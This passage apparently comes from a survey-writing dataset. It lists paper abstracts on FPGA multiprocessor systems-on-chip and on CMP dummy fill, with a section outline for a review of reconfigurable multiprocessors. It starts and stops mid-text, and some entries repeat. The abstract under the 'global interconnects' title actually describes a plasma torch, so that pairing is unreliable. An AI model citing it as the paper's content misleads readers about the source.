proposed to test controller design by implementing RT motor emulator linked to its controller drive in the same FPGA target. The gain with using this new approach is the ability to push past the operational limits of a specific environment and to test fault conditions that would otherwise be damaging or dangerous for a real motor. The developed MPSoC architectures consist of two and three SoftCore (MicroBlaze) processors that are linked by FIFO style communication. The implementation results, give an overview of MPSOC FPGA based controller benefits and illustrate the effect of interprocessor communication mode. --- paper_title: A parallel MPEG-4 encoder for FPGA based multiprocessor SoC paper_content: A parallel MPEG-4 simple profile encoder for FPGA based multiprocessor system-on-chip (SoC) is presented. The goal is a computationally scalable framework independent of platform. The scalability is achieved by spatial parallelization where images are divided to horizontal slices. Slice coding tasks are mapped to the multiprocessor consisting of four soft-cores arranged into master-slave configuration. Also, the shared memory model is adopted where large images are stored in shared external memory while small on-chip buffers are used for processing. The interconnections between memories and processors are realized with our HIBI network. Our main contributions are the scalable encoder framework as well as methods for coping with limited memory of FPGA. The current software only implementation processes 6 QCIF frames/s with three encoding slaves. In practice, speed-ups of 1.7 and 2.3 have been measured with two and three slaves, respectively. FPGA utilization of current implementation is 59% requiring 24 207 logic elements on Altera Stratix EP1S40. --- paper_title: Advantages of FPGA-based multiprocessor systems in industrial applications paper_content: Today, industrial production machines must be highly flexible in order to competitively account for dynamic and unforeseen changes in the product demands. This paper shows that field-programmable gate arrays (FPGAs) are especially suited to fulfil these requirements; FPGAs are very powerful, relatively inexpensive, and adaptable, since their configuration is specified in an abstract hardware description language. In addition to the benefits resulting from using an FPGA, the case study presented here shows how FPGAs can be used for implementing a sophisticated multiprocessor architecture. In the course of presentation, this paper furthermore argues that due to the excellent tool support and the availability of reusable functional modules (also known as intellectual properties) this approach can be adopted by almost any industrial hardware designer. --- paper_title: An MPSoC architecture for the Multiple Target Tracking application in driver assistant system paper_content: This article discusses the design of an application specific MPSoC architecture dedicated to multiple target tracking (MTT). This application has its utility in driver assistant systems, more precisely in collision avoidance and warning systems. An automotive-radar is used as the front end sensor in our application. The article examines the tradeoffs that must be taken into consideration in the realization of the entire MTT application in an embedded system. In our implementation of MTT, several independent parallel tasks have been identified and mapped onto a multiprocessor architecture to ensure the deadlines imposed by the application. Our study demonstrates that the joint utilization of reconfigurable circuits (namely FPGA) and MPSoC, facilitates the development of a flexible and efficient MTT system. --- paper_title: Symmetric Multiprocessing on Programmable Chips Made Easy paper_content: Vendor-provided softcore processors often support advanced features such as caching that work well in uniprocessor or uncoupled multiprocessor architectures. However, it is a challenge to implement symmetric multiprocessor on a programmable chip (SMPoPC) systems using such processors. This paper presents an implementation of a tightly coupled, cache-coherent symmetric multiprocessing architecture using a vendor-provided softcore processor. Experimental results show that this implementation can be achieved without invasive changes to the vendor-provided softcore processor and without degradation of the performance of the memory system. --- paper_title: Star-Wheels Network-on-Chip featuring a self-adaptive mixed topology and a synergy of a circuit - and a packet-switching communication protocol paper_content: Multiprocessor System-on-Chip is a promising realization alternative for the next generation of computing architectures providing the required data processing performance in high performance computing applications. Numerous scientists from industry and academic institutions investigate and develop novel processing elements and accelerators as can be seen in real devices like IBM's Cell or nVIDIA's Tesla GPU. Nevertheless, the on-chip communication of these multiple processor elements has to be optimized tailored to the actual requirement of the data to be processed. Network-on-Chip (NoC), Bus-based or even heterogeneous communication on chip often suffer from the fact of being inflexible due to their fixed physical realization. This paper presents a novel approach for a NoC, exploiting circuit-and packed-switched communication as well as a run-time adaptive and heterogeneous topology. An application scenario from image processing exploiting the implemented NoC on an FPGA delivers results like performance data and hardware costs. --- paper_title: Exploring FPGA Capabilities for Building Symmetric Multiprocessor Systems paper_content: Advances in FPGA technologies allow designing highly complex systems using on-chip FPGA resources and intellectual property (IP) cores. Furthermore, it is possible to build multiprocessor systems using hard-core or soft-core processors increasing the range of applications that can be implemented on an FPGA. This paper presents an implementation of a symmetric multiprocessor (SMP) system on an FPGA using a vendor provided soft-core processor and a new set of software libraries specially developed for writing applications for this kind of systems. Experimental results show how this approach can improve performance of parallelizable software applications. --- paper_title: Efficient Automated Synthesis, Programing, and Implementation of Multi-Processor Platforms on FPGA Chips paper_content: Emerging embedded System-on-Chip (SoC) platforms are increasingly becoming multiprocessor architectures. The advances in the FPGA chip technology make the implementation of such architectures in a single chip feasible and very appealing. Although the FPGA chip technology is well developed by companies such as Xilinx and Altera, the concepts and the necessary tool support for building multiprocessor systems on a single FPGA chip are still not mature enough. As a consequence, system designers experience significant difficulties in 1) designing multiprocessor systems on FPGAs in a short amount of time and 2) programming such systems in order to satisfy the performance needs of applications executed on them. In this paper we present our concept for multiprocessor system design, programing, and implementation that addresses and solves the above two problems in a particular way. We have implemented the concept in a tool called ESPAM which is briefly introduced as well. Also, we present some results obtained by applying our concept and ESPAM tool to automatically generate multiprocessor systems that execute a real-life application, namely a Motion-JPEG encoder. --- paper_title: An automated exploration framework for FPGA-based soft multiprocessor systems paper_content: FPGA-based soft multiprocessors are viable system solutions for high performance applications. They provide a software abstraction to enable quick implementations on the FPGA. The multiprocessor can be customized for a target application to achieve high performance. Modern FPGAs provide the capacity to build a variety of micro-architectures composed of 20-50 processors, complex memory hierarchies, heterogeneous interconnection schemes and custom co-processors for performance critical operations. However, the diversity in the architectural design space makes it difficult to realize the performance potential of these systems. In this paper we develop an exploration framework to build efficient FPGA multiprocessors for a target application. Our main contribution is a tool based on Integer Linear Programming to explore micro-architectures and allocate application tasks to maximize throughput. Using this tool, we implement a soft multiprocessor for IPv4 packet forwarding that achieves a throughput of 2 Gbps, surpassing the performance of a carefully tuned hand design. --- paper_title: An FPGA-based soft multiprocessor system for IPv4 packet forwarding paper_content: To realize high performance, embedded applications are deployed on multiprocessor platforms tailored for an application domain. However, when a suitable platform is not available, only few application niches can justify the increasing costs of an IC product design. An alternative is to design the multiprocessor on an FPGA. This retains the programmability advantage, while obviating the risks in producing silicon. This also opens FPGAs to the world of software designers. In this paper, we demonstrate the feasibility of FPGA-based multiprocessors for high performance applications. We deploy IPv4 packet forwarding on a multiprocessor on the Xilinx Virtex-II Pro FPGA. The design achieves a 1.8 Gbps throughput and loses only 2.6X in performance (normalized to area) compared to an implementation on the Intel IXP-28OO network processor. We also develop a design space exploration framework using integer linear programming to explore multiprocessor configurations for an application. Using this framework, we achieve a more efficient multiprocessor design surpassing the performance of our hand-tuned solution for packet forwarding. --- paper_title: Multiprocessor systems synthesis for multiple use-cases of multiple applications on FPGA paper_content: Future applications for embedded systems demand chip multiprocessor designs to meet real-time deadlines. The large number of applications in these systems generates an exponential number of use-cases. The key design automation challenges are designing systems for these use-cases and fast exploration of software and hardware implementation alternatives with accurate performance evaluation of these use-cases. These challenges cannot be overcome by current design methodologies which are semiautomated, time consuming, and error prone. ::: In this article, we present a design methodology to generate multiprocessor systems in a systematic and fully automated way for multiple use-cases. Techniques are presented to merge multiple use-cases into one hardware design to minimize cost and design time, making it well suited for fast design-space exploration (DSE) in MPSoC systems. Heuristics to partition use-cases are also presented such that each partition can fit in an FPGA, and all use-cases can be catered for. ::: The proposed methodology is implemented into a tool for Xilinx FPGAs for evaluation. The tool is also made available online for the benefit of the research community and is used to carry out a DSE case study with multiple use-cases of real-life applications: H263 and JPEG decoders. The generation of the entire design takes about 100 ms, and the whole DSE was completed in 45 minutes, including FPGA mapping and synthesis. The heuristics used for use-case partitioning reduce the design-exploration time elevenfold in a case study with mobile-phone applications. ---
Title: Reconfigurable Multiprocessor Systems: A Review Section 1: Introduction Description 1: Introductory background on the evolution and significance of MPSoC, highlighting the transition to FPGA-based multiprocessor designs. Section 2: Viability of FPGA-Based Multiprocessor Systems Description 2: Discussion on the advantages, challenges, and specific use cases where FPGA-based multiprocessor systems are beneficial. Section 3: FPGA-Based Multiprocessor Systems Description 3: Several examples of FPGA-based multiprocessor systems implemented by the research community. Section 4: Architecture Background Description 4: Overview of target application architectures for FPGA-based multiprocessor systems, including Master-Slave, Pipeline, and Net architectures. Section 5: Classification Description 5: Traditional classification of MPSoCs into homogeneous and heterogeneous systems and shared-memory versus distributed-memory systems. Section 6: Heterogeneous FPGA-Based Systems Description 6: Detailed examples and case studies of application-specific FPGA-based multiprocessor systems and their architectures. Section 7: Homogeneous FPGA-Based Systems Description 7: Examples and benefits of homogeneous multiprocessor systems, along with comparisons to heterogeneous systems. Section 8: Run-Time Reconfigurable Systems Description 8: Exploration of run-time reconfigurability in multiprocessor systems and new taxonomies for these systems. Section 9: Design Challenges Description 9: Critical issues in FPGA-based multiprocessor design, including resource limitations, synchronization, cache coherency, and on-chip communication. Section 10: Design Methodology Description 10: Two methodologies for building multiprocessor systems in FPGA: hand-tuned design and automatic synthesis design, along with their respective benefits and limitations. Section 11: Conclusion Description 11: Summary of the survey findings, major challenges, and future directions in FPGA-based multiprocessor system design.
CMP Fill Synthesis: A Survey of Recent Studies
7
--- paper_title: DFM: linking design and manufacturing paper_content: Until the move to the 130nm node, yield was an issue only for product engineers and engineers on the production line. Design engineers did not need to think explicitly about yield, or understand the manufacturing process. Beginning at the 130nm node, yield has become more problematic, and the defect mechanisms that contribute to yield loss are very different. Where random defects used to be dominant, we now have defects due to lithographic issues, and pattern (or design) dependent issues. This paper explains how these latter defect mechanisms differ from random defects and how and why the design engineer needs to become involved to mitigate the problem. On the lithography topic, this paper briefly examines techniques such as OPC (optical proximity correction) and PSM (phase shift masking), and explain their design and yield impact. We also examine issues such as dummy metal fill for CMP, redundant via insertion, as ways to mitigate pattern dependent yield issues. --- paper_title: The Physical and Electrical Effects of Metal-Fill Patterning Practices for Oxide Chemical-Mechanical Polishing Processes paper_content: In oxide chemical-mechanical polishing (CMP) processes, layout pattern dependent variation in the interlevel dielectric (ILD) thickness can reduce yield and impact circuit performance. Metal-fill patterning practices have emerged as a technique for substantially reducing layout pattern dependent ILD thickness variation. We present a generalizable methodology for selecting an optimal metal-fill patterning practice with the goal of satisfying a given dielectric thickness variation specification while minimizing the added interconnect capacitance associated with metal-fill patterning. Data from two industrial-based experiments demonstrate the beneficial impact of metal-fill on dielectric thickness variation, a 20% improvement in uniformity in one case and a 60% improvement in the other case, and illustrate that pattern density is the key mechanism involved. The pros and cons of two different metal-fill patterning practices-grounded versus floating metal-are explored. Criteria for minimizing the effect of floating or grounded metal-fill patterns on delay or crosstalk parameters are also developed based on canonical metal-fill structures. Finally, this methodology is illustrated using a case study which demonstrates an 82% reduction in ILD thickness variation. --- paper_title: Chemical processes in glass polishing paper_content: Abstract Chemical processes which occur during glass polishing are reviewed within the context of current mechanical models for the polishing process. The central chemical process which occurs is the interaction of both the glass surface and the polishing particle with water. A detailed mechanico-chemical model for the polishing process is proposed. --- paper_title: Implementation of CMP-based design rules and patterning practices paper_content: This paper discusses specific die patterning techniques utilized during the implementation of a CMP-based BEOL within Digital's Alpha technologies. Customary application of inter-level dielectric (ILD) CMP, to eliminate topographically induced defect mechanisms and increase photolithographic focal budget margins for Alpha, indicated the need to strictly control both interand intra-die dielectric capacitance and thickness. To this end, several die patterning strategies were used to minimize the feature size and pattern density dependencies of ILD CMP as well as aid in the fast paced evolution from test vehicle to product chip reticles. Quantification of inter-level and intra-die thickness control with respect to ghost/partial die patterning, zero level (ZL) and perimeter bordering, dummy/filler feature patterning and general CMP-based design rules will be addressed within the context of analysis of variance (ANOVA). Further discussed will be the empirical rules-of-thumb and critical dimension (CD) variance definitions which provided the planarity targets utilized throughout the framework of these experiments. --- paper_title: Using Smart Dummy Fill And Selective Reverse Etchback For Pattern Density Equalization paper_content: The techniques of dummy fill and reverse etchback are often used prior to a chemical mechanical polishing (CMP) process to prevent film pattern density mismatches that lead to post-CMP film thickness variation. In this work, we present a methodology that utilizes both techniques in an intelligent fashion, and shows that both techniques can be used together to create a better balance of pattern densities than each technique can do separately. We introduce the idea of a selective reverse etchback method to lower the pattern density in high density regions, and smart dummy fill to raise pattern densities in low density regions. We then verify the methodology on the STI active area layer of a test mask. --- paper_title: Effects of slurry flow rate and pad conditioning temperature on dishing, erosion, and metal loss during copper CMP paper_content: Center for USA The effect of slurry flow rate, pad surface temperature, and temperature during the pad conditioning process on surface tribology and pattern-related defects like dishing, erosion, and metal loss was studied. Experimental results suggest that dishing and erosion levels decreased with increase in slurry flow rate. Conditioning experiments at various temperatures revealed a significant impact of temperature on the effectiveness of the conditioning process and also on subsequent polishing performance. The polishing pad was conditioned more aggressively at lower temperatures compared to conditioning at elevated temperatures. The removal rate and coefficient of friction were found to be significantly affected by the pad surface temperature. The amount of dishing increased with increase in pad surface temperature and the uniformity of polishing. The study ascertains a correlation between process parameters and the extent of planarity defects. This study also demonstrates the use of a modified bench-top chemical mechanical polish (CMP) tester and large-stage atomic force microscope with automatic multiscan imaging procedure. --- paper_title: Integration of chemical-mechanical polishing into CMOS integrated circuit manufacturing paper_content: Abstract Planarization by chemical-mechanical polishing (CMP) has been exploited by IBM in the development and manufacture of CMOS products since 1985. Among the products that use this technology are the 4-Mbit DRAM (which uses polysilicon, oxide, tungsten-line and tungsten-stud planarization) and its logic family (which uses four oxide and four tungsten-stud planarization steps). CMP is also used in the planarization of oxide shallow isolation trenches, as in the 16-Mbit DRAM. Reduced sensitivity to many types of defects is possible with CMP. A wafer that is truly flat is easier to clean, eliminates step coverage concerns, provides for better photolithographic and dry etch yields, and generally minimizes complications from prior level structures. Oxide CMP reduces sensitivity to certain pre-existing defects, such as crystalline inclusions or foreign material in an interlevel dielectric. Metal CMP can reduce the incidence of intralevel shorts relative to conventional RIE processing. Random defects associated with CMP, such as slurry residues and mechanical damage, are controlled by careful optimization of the post-polish clean and of the polish process itself. Systematic defects, such as incomplete planarization over very large structures, are controlled by process optimization and prudent design limitations. These include such things as constraints on the image size, the distance between images, and/or the local pattern density. Since its introduction in the 4-Mbit DRAM, there has been a steady increase in the use of chemical-mechanical polishing in IBM CMOS products. The number of steps, processes and materials polished continue to rise, both in current and planned future products. Individual applications range from the simple removal of back-side films to complex insulator or metal planarization requiring high removal uniformity. The process tolerances delivered by CMP have decreased faster than image size, even in the face of dramatic increases in circuit and layout complexity. CMP tools are installed in IBM semiconductor manufacturing and development sites worldwide. Chemical-mechanical polish processes and applications provide unique leverage to IBM products, and are a crucial part of both current and planned IBM CMOS technologies. --- paper_title: Filling and slotting: analysis and algorithms paper_content: In very deep-submicron VLSI, certain manufacturing steps &mdash notably optical exposure, resist development and etch, chemical vapor deposition and chemical-mechanical polishing (CMP)&mdash have varying effects on device and interconnect features depending on local characteristics of the layout. To make these effects uniform and predictable, the layout itself must be made uniform with respect to certain density parameters. Traditionally, only foundries have performed the post-processing needed to achieve this uniformity, via insertion (“filling”) or partial deletion (“slotting”) of features in the layout. Today, however, physical design and verification tools cannot remain oblivious to such foundry post-processing. Without an accurate estimate of the filling and slotting, RC extraction, delay calculation, and timing and noise analysis flows will all suffer from wild inaccuracies. Therefore, future place-and-route tools must efficiently perform filling and slotting prior to performance analysis within the layout optimization loop. We give the first formulations of the filling and slotting problems that arise in layout post-processing or layout optimization for manufacturability. Such formulations seek to add or remove features to a given process layer, so that the local area or perimeter density of features satisfies prescribed upper and lower bounds in all windows of a given size. We also present efficient algorithms for density analysis as well as for filling/slotting synthesis. Our work provides a new unification between manufacturing and physical design, and captures a number of general requirements imposed on layout by the manufacturing process. --- paper_title: Spin-On Glass: Materials and Applications in Advanced IC Technologies paper_content: This thesis deals with the study of shallow PN junction formation by dopant diffusion from Spin-On Glass (SOG) for future deep sub-micron BiCMOS technology. With the advantages of no transient enhanced diffusion and no metal contamination, diffusion from highly doped SOG (also called spin-on dopant - SOD) is a good technology for shallow junction formation. In this thesis, diffusion of impurities from SOD into Si and polysilicon on silicon structure has been studied. This shallow junction formation technique using SOD has been applied in realisation of two important devices, i.e. high frequency bipolar transistor and deep sub-micron elevated source/drain MOSFET. --- paper_title: Handbook of VLSI microlithography : principles, technology, and applications paper_content: Issues and Trends Affecting Lithography Tool Selection Strategy Resist Technology u Design, Processing, and Applications Lithography Process Monitoring and Defect Detection Techniques and Tools for Photo Metrology Techniques and Tools for Optical Lithography Microlithography Tool Automation Electron-Beam ULSI Applications Rational Vibration and Structural Dynamics for Lithographic Tool Installations Applications of Ion Microbeams Lithography and Direct Processing X-Ray Lithography Part I Part II Acknowledgment References Index --- paper_title: Arrhenius Characterization of ILD and Copper CMP Processes paper_content: To date, chemical mechanical planarization (CMP) models have relied heavily on parameters such as pressure, velocity, slurry, and pad properties to describe material removal rates. One key parameter, temperature, which can impact both the mechanical and chemical facets of the CMP process, is often neglected. Using a modified definition of the generalized Preston's equation with the inclusion of an Arrhenius relationship, thermally controlled polishing experiments are shown to quantify the contribution of temperature to the relative magnitude of the thermally dependent and thermally independent aspects of copper and interlayer dielectric (ILD) CMP. The newly defined Preston's equation includes a modified definition of the activation energy parameter contained in the Arrhenius portion, the combined activation energy, which describes all events (chemical or mechanical) that are impacted by temperature during CMP. Studies indicate that for every consumable set combination (i.e., slurry and polishing pad) a characteristic combined Arrhenius activation energy can be calculated for each substrate material being polished. --- paper_title: Modeling of chemical mechanical polishing for shallow trench isolation paper_content: Chemical mechanical polishing (CMP) is a key process enabling shallow trench isolation (STI), which is used in current integrated circuit manufacturing processes to achieve device isolation. Excessive dishing and erosion in STI CMP processes, however, create device yield concerns. This thesis proposes characterization and modeling techniques to address a variety of concerns in STI CMP. Three major contributions of this work are: characterization and modeling of STI CMP processes, both conventional and nonconventional; layout optimization to reduce pattern-dependent dishing and erosion; and modeling of wafer nanotopography impact on STI CMP yield. An STI CMP characterization method is combined with a chip-scale pattern-dependent model to create a methodology that enables tuning of STI CMP process models and prediction of post-CMP dishing, erosion, and clearing times on arbitrary layouts. Model extensions enable characterization of STI CMP processes that use nonconventional consumable sets, including fixed abrasive pads and high-selectivity silica-based and ceria-based slurries. Experimental data validates the accuracy of the model for both conventional and nonconventional processes. Layout optimization techniques are developed that reduce pattern-density dependent dishing and erosion. Layout design modification is achieved through the use of dummy STI active areas and selective reverse etchback structures. Smart algorithms allow for optimal density distributions across the layout. The effect of wafer nanotopography (height variations that exist on unpatterned silicon wafers) is explored, characterized, and modelled. A diagnostic tool for examining the impact of nanotopography on STI device yields is developed, based on contact wear modeling. An aggregate estimator for the combined effect of wafer-scale nanotopography and chip-scale pattern-dependent dishing and erosion is developed. The techniques developed in this thesis can be used both for process optimization and for diagnosis and correction of potential problems due to layout, wafer and CMP process interaction. The characterization and modeling methods create a comprehensive set of tools for process characterization and post-CMP erosion and dishing prediction in STI processes. Thesis Supervisor: Duane S. Boning Title: Associate Professor of Electrical Engineering and Computer Science --- paper_title: Effect of Slurry Flow Rate on Tribological, Thermal, and Removal Rate Attributes of Copper CMP paper_content: cFujimi Incorporated, Kagamigahara, Gifu Prefecture 509-0108, Japan Chemical mechanical polishing of copper is examined experimentally and theoretically as a function of slurry flow rate and the product of applied wafer pressure and relative sliding speed ( p 3 V). It is observed that under constant tribological conditions, the removal rate at any fixed value ofp 3 V generally decreases as slurry flow rate increases. The increased cooling of the wafer surface, as a result of increased slurry flow rate, is used to explain this reduction in the reaction rate. At a fixed flow rate, it is further observed that removal rate does not necessarily increase monotonically with p 3 V. The rate instead depends on the particular values of pressure and velocity, regardless of the fact that they may result in the same value of p 3 V. This dependence is shown to be caused by changes in the coefficient for convective heat-transfer between the wafer and the slurry, as well as the heat partition factor, which determines the fraction of the total frictional power that heats the wafer. Results further indicate that trends in copper removal rate can be adequately explained with a Langmuir-Hinshelwood kinetics model with both mechanical and chemical rate components. --- paper_title: Rapid characterization and modeling of pattern-dependent variation in chemical-mechanical polishing paper_content: Pattern-dependent effects are a key concern in chemical-mechanical polishing (CMP) processes. In oxide CMP, variation in the interlevel dielectric (ILD) thickness across each die and across the wafer can impact circuit performance and reduce yield. In this work, we present new test mask designs and associated measurement and analysis methods to efficiently characterize and model polishing behavior as a function of layout pattern factors-specifically area, pattern density, pitch, and perimeter/area effects. An important goal of this approach is rapid learning which requires rapid data collection. While the masks are applicable to a variety of CMP applications including back-end, shallow-trench, or damascene processes, in this study we focus on a typical interconnect oxide planarization process, and compare the pattern-dependent variation models for two different polishing pads. For the process and pads considered, we find that pattern density is a strongly dominant factor, while structure area, pitch, and perimeter/area (aspect ratio) play only a minor role. --- paper_title: Filling and slotting: analysis and algorithms paper_content: In very deep-submicron VLSI, certain manufacturing steps &mdash notably optical exposure, resist development and etch, chemical vapor deposition and chemical-mechanical polishing (CMP)&mdash have varying effects on device and interconnect features depending on local characteristics of the layout. To make these effects uniform and predictable, the layout itself must be made uniform with respect to certain density parameters. Traditionally, only foundries have performed the post-processing needed to achieve this uniformity, via insertion (“filling”) or partial deletion (“slotting”) of features in the layout. Today, however, physical design and verification tools cannot remain oblivious to such foundry post-processing. Without an accurate estimate of the filling and slotting, RC extraction, delay calculation, and timing and noise analysis flows will all suffer from wild inaccuracies. Therefore, future place-and-route tools must efficiently perform filling and slotting prior to performance analysis within the layout optimization loop. We give the first formulations of the filling and slotting problems that arise in layout post-processing or layout optimization for manufacturability. Such formulations seek to add or remove features to a given process layer, so that the local area or perimeter density of features satisfies prescribed upper and lower bounds in all windows of a given size. We also present efficient algorithms for density analysis as well as for filling/slotting synthesis. Our work provides a new unification between manufacturing and physical design, and captures a number of general requirements imposed on layout by the manufacturing process. --- paper_title: Study of Floating Fill Impact on Interconnect Capacitance paper_content: It is well known that fill insertion adversely affects total and coupling capacitance of interconnects. While grounded fill can be extracted by full-chip extractors, floating fill can be reliably extracted by 3D field solvers only. Due to poor understanding of the impact of floating fill on capacitance, designers insert floating fill conservatively. In this paper we study the impact of floating fill insertion on coupling and total capacitance when the fill geometry, and both the interconnects between which the capacitance is measured are on the same layer. We show that the capacitance with same-layer neighboring interconnects is a large fraction of total capacitance, and that it is significantly affected by fill geometries on the same layer. We analyze the effect of fill configuration parameters such as fill size, fill location, interconnect width, interconnect spacing, etc. and consider edge effects and effects occurring due to insertion of several fill geometries in close proximity. Based on our findings, we propose certain guidelines to achieve high metal density while having smaller impact on interconnect capacitance. Finally, we validate the proposed guidelines using representative process parameters and a 3D field solver. On average coupling capacitance increase due to floating-fill insertion decreases by /spl sim/ 53% on using the proposed guidelines. --- paper_title: Variability-driven considerations in the design of integrated-circuit global interconnects paper_content: A torch with a turbulized supply of a plasma forming gas comprises an electrode having a high-melting insert and a flat end face, and a nozzle with an internal surface having two mated portions: one cylindrical and one tapering; and the diameter of the electrode flat end face amounts essentially to 0.4-0.5 diameter of the electrode proper and the radius of conjugation of the nozzle cylindrical and tapering portions is equal essentially to the length of its cylindrical portion. Due to such a design, the inventive torch features a long service life of both the electrode and the nozzle. --- paper_title: Dummy filling methods for reducing interconnect capacitance and number of fills paper_content: In recent system-on-chip (SoC) designs, floating dummy metals inserted for planarization have created serious problems because of increased interconnect capacitance and the enormous amount of fill required. We present new methods to reduce the interconnect capacitance and the amount of dummy metals needed. These techniques include three ways of filling: (1) improved floating square fills, (2) floating parallel lines, and (3) floating perpendicular lines (with spacing between dummy metals above and below signal lines). We also present efficient simple formulas for estimating the appropriate spacing and number of fills. In our experiments, the capacitance increase using the traditional regular square method was 13.1%, while that using the methods of improved square fills, extended parallel lines, and perpendicular lines was 2.5%, 2.4%, and 1.1%, respectively. Moreover, the number of necessary dummy metals can be reduced by two orders of magnitude through use of the parallel line method. --- paper_title: A novel CBCM method free from charge injection induced errors: investigation into the impact of floating dummy-fills on interconnect capacitance paper_content: Starting from CIEF (charge injection induced errors) CBCM (charge-based capacitance measurement), a novel CBCM method free from the errors induced by charge-injection is developed. This is used for the first time to investigate the impact of floating dummy-fills on interconnect capacitance, in practice. The impact of floating dummy-fills is confirmed to play an important role on successful circuit design. Besides, a guideline to optimize the chip performance and minimize the crosstalk by dummy pattern design is also proposed in this paper. --- paper_title: Study of Floating Fill Impact on Interconnect Capacitance paper_content: It is well known that fill insertion adversely affects total and coupling capacitance of interconnects. While grounded fill can be extracted by full-chip extractors, floating fill can be reliably extracted by 3D field solvers only. Due to poor understanding of the impact of floating fill on capacitance, designers insert floating fill conservatively. In this paper we study the impact of floating fill insertion on coupling and total capacitance when the fill geometry, and both the interconnects between which the capacitance is measured are on the same layer. We show that the capacitance with same-layer neighboring interconnects is a large fraction of total capacitance, and that it is significantly affected by fill geometries on the same layer. We analyze the effect of fill configuration parameters such as fill size, fill location, interconnect width, interconnect spacing, etc. and consider edge effects and effects occurring due to insertion of several fill geometries in close proximity. Based on our findings, we propose certain guidelines to achieve high metal density while having smaller impact on interconnect capacitance. Finally, we validate the proposed guidelines using representative process parameters and a 3D field solver. On average coupling capacitance increase due to floating-fill insertion decreases by /spl sim/ 53% on using the proposed guidelines. --- paper_title: Analyzing the effects of floating dummy-fills: from feature scale analysis to full-chip RC extraction paper_content: Studies the effects of dummy-fills on the interconnect capacitance and the global planarity of chips in order to provide the design guideline of the dummy-fills. A simple but accurate full-chip RC extraction methodology taking the floating dummy-fills into account is proposed and applied to the analysis of changes in capacitance and signal delay of the global interconnects, for the first time. The results for 0.18 /spl mu/m designs clearly demonstrate the importance of considering floating dummy-fills in the interconnect modeling and the full-chip RC extraction. --- paper_title: A statistical method for fast and accurate capacitance extraction in the presence of floating dummy fills paper_content: Dummy fills are being extensively used to enhance CMP planarity. However presence of these fills can have a significant impact on the values of interconnect capacitances. Accurate capacitance extraction accounting for these dummies is CPU intensive and cumbersome. For one, there are typically hundreds to thousands of dummy fills in a small layout region, which stress the general purpose capacitance extractor. Second, since these dummy fills are not introduced by the designers, it is of no interest for them to see the capacitances to dummy fills in the extraction reports; they are interested in equivalent capacitances associated with signal power and ground nets. Hence extracting equivalent capacitances across nets of interest in the presence of large number of dummy fills is an important and challenging problem. We present a novel extension to the widely popular Monte-Carlo capacitance extraction technique. Our extension handles the dummy fills efficiently. We demonstrate the accuracy and scalability of our approach by two methods: (i) classical and golden technique of finding equivalent interconnect capacitances by eliminating dummy fills through the network reduction method and (ii) comparing extracted capacitances with measurement data from a test chip. --- paper_title: An exhaustive method for characterizing the interconnect capacitance considering the floating dummy-fills by employing an efficient field solving algorithm paper_content: This paper presents an exhaustive method to characterize the interconnect capacitances while taking the floating dummy-fills into account. Results of the case study with typical floating dummy-fills show that the inter-layer capacitances are also an important factor in the electrical consideration for the dummy-fills. An efficient field solving algorithm is implemented into the 3D finite-difference solver and its computational efficiency is compared with the industry-standard RAPHAEL. Furthermore, the overall flow for extracting the parasitic capacitance considering the dummy-fills at the full-chip level is discussed and the underlying assumption is examined. --- paper_title: Filling algorithms and analyses for layout density control paper_content: In very deep-submicron very large scale integration (VLSI), manufacturing steps involving chemical-mechanical polishing (CMP) have varying effects on device and interconnect features, depending on local characteristics of the layout. To reduce manufacturing variation due to CMP and to improve performance predictability and yield, the layout must be made uniform with respect to certain density criteria, by inserting "fill" geometries into the layout. To date, only foundries and special mask data processing tools perform layout post-processing for density control. In the future, better convergence of performance verification flows will depend on such layout manipulations being embedded within the layout synthesis (place-and-route) flow. In this paper, we give the first realistic formulation of the filling problem that arises in layout optimization for manufacturability. Our formulation seeks to add features to a given process layer, such that (1) feature area densities satisfy prescribed upper and lower bounds in all windows of given size and (2) the maximum variation of such densities over all possible window positions in the layout is minimized. We present efficient algorithms for density analysis, notably a multilevel approach that affords user-tunable accuracy. We also develop exact solutions to the problem of fill synthesis, based on a linear programming approach. These include a linear programming (LP) formulation for the fixed-dissection regime (where density bounds are imposed on a predetermined set of windows in the layout) and an LP formulation that is automatically generated by our multilevel density analysis. We briefly review criteria for fill pattern synthesis, and the paper then concludes with computational results and directions for future research. --- paper_title: Optimized pattern fill process for improved CMP uniformity and interconnect capacitance paper_content: In multilevel IC manufacturing, it's important to have a planar surface preceding the next layer to avoid topographical margin issues. To achieve the local, as well as global, planarity of the wafer surface many innovative technologies have been developed. The development of Chemical-Mechanical Polishing (CMP) has led to dramatic improvement in planarity of dielectrics and later in the development of planar plug-fill and dual damascene copper metallization. It is well known that CMP causes dishing of a layer to be planarized due to uneven distribution of device structures and thus reducing the effectiveness of this technology. One of the solutions for this dishing phenomenon has been the introduction of pattern fill methodology to improve the planarity of a given layer. However, dummy pattern adds capacitive load and thus, parasitic effects on both analog and digital circuits. In this paper a unique fill methodology is presented that reduces the impact on parasitic capacitance while improving the dielectric planarity through the use of irregularly shaped fill features and restrictions to placement of these features. --- paper_title: Simple and Accurate Models for Capacitance Increment due to Metal Fill Insertion paper_content: Inserting metal fill to improve inter-level dielectric thickness planarity is an essential part of the modern design process. However, the inserted fill shapes impact the performance of signal interconnect by increasing capacitance. In this paper, we analyze and model the impact of the metal dummy on the signal capacitance with various parameters including their electrical characteristic, signal dimensions, and dummy shape and dimensions. Fill has differing impact on interconnects depending on whether the signal of interest is in the same layer as the fill or not. In particular intra-layer dummy has its greatest impact on coupling capacitance while inter-layer dummy has more impact on the ground capacitance component. Based on an analysis of fill impact on capacitance, we propose simple capacitance increment models (Cc for intra-layer dummy and Cg for inter-layer dummy). To consider the realistic case with both signals and metal fill in adjacent layers, we apply a weighting function approach in the ground capacitance model. We verify this model using simple test patterns and benchmark circuits and find that the models match well with field solver results (1.2% average error with much faster runtime than commercial extraction tools, the runtime overhead reduced by ~75% for all benchmark circuits). --- paper_title: Efficient 3-D extraction of interconnect capacitance considering floating metal fills with boundary element method paper_content: Inserting dummy (area fill) metals is necessary to reduce the pattern-dependent variation of dielectric thickness in the chemical-mechanical polishing (CMP) process. Such floating dummy metals affect interconnect capacitance and, therefore, signal delay and crosstalk significantly. To take the floating dummies into account, an efficient method for three-dimensional (3-D) capacitance extraction based on boundary element method is proposed. By introducing a floating condition into the direct boundary integral equation (BIE) and adopting an efficient preconditioning technique, and the quasi-multiple medium (QMM) acceleration, the method achieves very high computational speed. For some typical structures of area fill, the presented algorithm has shown over 1000/spl times/ speedup over the industry-standard Raphael while preserving high accuracy. Compared with the recently proposed PASCAL in the work of Park et al. (2000), the proposed method also has about ten times speedup. Since the dummies are not regarded 